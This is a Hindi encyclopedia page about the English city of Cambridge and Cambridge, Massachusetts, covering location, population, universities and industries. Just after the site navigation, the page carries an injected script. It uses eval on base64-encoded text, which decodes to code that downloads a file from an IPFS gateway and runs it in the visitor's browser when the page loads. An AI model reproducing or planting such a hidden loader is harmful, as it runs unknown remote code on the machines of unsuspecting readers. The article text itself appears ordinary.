कैम्ब्रिज

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

चित्र:Tranfer-icon.png यह लेख परिष्कृत रूप में भारतकोश पर बनाया जा चुका है। भारतकोश पर देखने के लिए यहाँ क्लिक करें

केंब्रिज इंग्लैंड का एक नगर जो केम (Cam) नदी के दाहिने तट पर लंदन के उत्तरपूर्व ५० मील की दूरी पर स्थित है। इसका विकास एक दुर्ग के चारों ओर हुआ है। नगर का क्षेत्रफल १०,०६० एकड़ तथा जनसंख्या १,००,२०० (१९६९) है। यहाँ प्राचीन काल से अनेक मेले लगते आए हैं, अब भी वार्नवेल का ग्रीष्मकालीन मेला प्रत्येक वर्ष २२ जून को आरंभ होता है। विद्या के केंद्र के रूप में यहाँ केंब्रिज विश्वविद्यालय तथा गिल्ड हॉल लायब्रेरी हैं। यहाँ रेडियो, टेलिविजन, वैज्ञानिक यंत्र, सीमेंट, पीतल एवं लोहे की ढलाई के उद्योग हैं।

संयुक्त राज्य अमरीका के मेसाचुसेट्स राज्य का एक नगर जो चार्ल्स नदी के बाएँ तट पर बोस्टन से ५ मील उत्तरपश्चिम स्थित है (स्थित ४२ १८ उ. अ. से ७१४ पू. दे.)। यहाँ सुप्रसिद्ध हार्वर्ड विश्वविद्यालय है जिसकी स्थापना १६३६ ई. में हुई थी। इसकी जनसंख्या १,०७,७१६ (१९६०) है। इसकी ख्याति मुद्रण एवं प्रकाशन के लिये है। केंब्रिज में रसायन, तार, बिजली तथा काँच के सामान का निर्माण किया जाता है।

टीका टिप्पणी और संदर्भ